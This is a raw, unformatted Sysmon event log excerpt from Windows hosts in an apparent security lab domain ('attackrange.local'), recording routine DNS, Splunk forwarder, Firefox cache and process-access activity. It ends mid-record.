354300x8000000000000000107457Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:50.149{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50181- 23542300x800000000000000083453Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:53.394{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A02EEAC8CE41E835AD9031DD5DED1C12,SHA256=BFC498DB7007A506B9E3340DBBCC2755352773DBA1171137E4FDA81798F224DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107478Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:53.705{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\6893MD5=0B61F832280AC76ED2B2D674CD8EC4EB,SHA256=42D94D9D078EFC2EA41CB94C0E51BE7D6D43F5D7A201394617658C90F0FBFEBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107477Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:53.404{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B428618A89ED263F5AB8CE0DBEAFE008,SHA256=80DEC2400DF5E18E8E6355C7481886EA115883B15778C3D807EBB974BABE143B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107476Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.188{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-57973- 354300x8000000000000000107475Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.163{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51323- 23542300x8000000000000000107479Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:54.406{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A282EF5A5BD8F4A680E4FEF4DF1A761,SHA256=F0A2A5A14E387B19292F57E75F7D72C0CFB416A48E4CCB10129F0C25E34573B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083454Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:54.394{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2655CAD8D3C4368118EBCB3C687669DD,SHA256=28B02A32F150510B6305B8A26F5AF8577EBCF4A2590254B6106B102B9DC5F383,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107488Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:55.792{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\security_state\data.safe.binMD5=D09AD16F18A4F9E7D395498FC19386AB,SHA256=D0552BB3D636E570D82E0265632C503B68CE9CF6315C7D26A0721EF877DC11E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107487Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:54.865{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-55784-true2001:500:1:0:0:0:0:53h.root-servers.net53domain 23542300x8000000000000000107486Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:55.524{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\8728MD5=799FF6AB4CAF703B8A499AA4ACCCAF1A,SHA256=17EE684ED237C47116CF2EE3A4B184321DF00CC2871330E338E76AF780CCD4F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107485Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:55.523{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\26374MD5=666BD65BD562BD2187CC96E060E2B75B,SHA256=8A01BAC91B4982682D2643EB2BECDC7FF45F48179A26C8973CA9601EB1C96D24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107484Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:55.523{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\16766MD5=27559593F01654975F139D76A108D32B,SHA256=4648D3886BA667B9C27B79C4546F6573AC8A1647229A17DB9DCB0D9A37A1A3D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107483Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:55.522{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\28680MD5=3ED0A5A2CA2FFE41A17D39799A5ADA8B,SHA256=EBC7BC5F31BAAE081DCED2D391F023352780B75A28D6FCED924810F7A6B11B98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107482Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:55.521{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\9822MD5=F886D441488B135ED3E632964A2235F0,SHA256=7ADB6C3A6F10A157920979E516A2090E06B8C624F3ACE3FAFCAAC3D5C86120AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107481Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:55.409{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B63248D134636316A23B377C115EDA0F,SHA256=FFE5685B4191E9506AC5A7607DD6A0896BDCCA1E2ED66DFEA502A6903B91952C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083456Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:55.395{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D16DAB56286798059441B382029FE6A0,SHA256=4F778364DDE2046AFFDA3523BCB6664A9F936C344AF98409F9B8DCF56C55A0B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107480Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:54.269{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51910-false10.0.1.12-8000- 354300x800000000000000083455Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:53.637{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50170-false10.0.1.12-8000- 23542300x8000000000000000107489Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:56.414{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8443EAB4AF1D13EE4F237CF983B1729,SHA256=4D4F38F04750AFC4DD7CB771392C8A4D00DB12ADD2A562B401B34051D566EB1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083457Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:56.399{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AF91B91614D0B36752BD0F8DBB42EFE,SHA256=5CBE8DD95D05400A3310424CCD2D2B30E074935FCDDD3CE4BC2A4FF66505E5BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083458Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:57.493{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA5CA748DC6BA303E55AE884ED9DC9DD,SHA256=033F1AF55615FB3E1284DFC387CB4F9B0C27EF496A4A675FFA201E78FE703580,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107491Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:57.417{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C74F7579B5BBCADE647B4149EF1DE31,SHA256=2621B78F2745EE2B0992971AC3CAAACC8AB5DA580D9D6AB9A366B85E2A72CDD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107490Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:57.025{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083472Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4F6-615A-9501-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083471Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083470Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083469Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083468Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083467Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083466Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083465Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083464Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083463Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083462Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B4F6-615A-9501-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083461Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.868{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4F6-615A-9501-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083460Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.869{2FDD8D40-B4F6-615A-9501-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083459Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:58.493{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C904F08A8A52614DE44A41ED7FF46DCE,SHA256=EB2F1AF505F2B8B73A83FD1FFAE7C7F4E7FF995D708B955A35A63E090A044EE9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107501Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:58.613{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4F6-615A-5B02-00000000FC01}7608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107500Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 